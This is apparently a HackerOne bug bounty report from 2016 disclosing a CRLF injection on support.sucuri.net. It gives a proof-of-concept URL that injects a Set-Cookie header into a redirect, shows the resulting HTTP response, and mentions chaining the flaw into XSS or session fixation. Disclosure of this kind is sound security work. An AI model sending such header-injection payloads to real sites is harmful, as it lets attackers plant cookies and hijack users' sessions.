Sucuri: [support.sucuri.net] CRLF Injection

2016-06-14T20:03:14
ID H1:144769
Type hackerone
Reporter bobrov
Modified 2016-10-24T22:25:33

Description

PoC (any browser except FireFox): http://support.sucuri.net/%23%0dSet-Cookie:crlf=injection;domain=.sucuri.net;

HTTP Response: HTTP/1.1 301 Moved Permanently Date: Tue, 14 Jun 2016 19:56:14 GMT Server: Apache Location: https://support.sucuri.net/# <= injeciton \r Set-Cookie:crlf=injection;domain=.sucuri.net;

This vulnerability could be used in combination with others. For example, XSS via Cookie or session fixation.